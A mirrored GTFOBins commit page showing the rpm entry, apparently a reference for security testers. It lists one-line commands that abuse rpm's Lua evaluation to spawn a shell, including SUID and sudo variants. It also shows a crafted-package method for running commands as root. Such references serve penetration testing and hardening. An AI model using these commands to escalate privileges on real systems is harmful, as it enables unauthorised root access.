mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-27 07:18:48 +01:00
3bd955e8cc
From rpm versions 4.9.0 and on, posix.exec() will return an error unless called from a child process created with posix.fork(). os.execute() may be used instead.

This change is documented in these two resources:
- http://rpm.org/user_doc/lua.html
- https://rpm-packaging-guide.github.io/

Close #53.
19 lines
593 B
Markdown
---
functions:
  shell:
    - code: rpm --eval '%{lua:os.execute("/bin/sh")}'
  suid:
    - code: ./rpm --eval '%{lua:os.execute("/bin/sh", "-p")}'
  sudo:
    - code: sudo rpm --eval '%{lua:os.execute("/bin/sh")}'
    - description: |
        It runs commands using a specially crafted RPM package. Generate it with [fpm](https://github.com/jordansissel/fpm) and upload it to the target.
        ```
        TF=$(mktemp -d)
        echo 'id' > $TF/x.sh
        fpm -n x -s dir -t rpm -a all --before-install $TF/x.sh $TF
        ```
      code: |
        sudo rpm -ivh x-1.0-1.noarch.rpm
---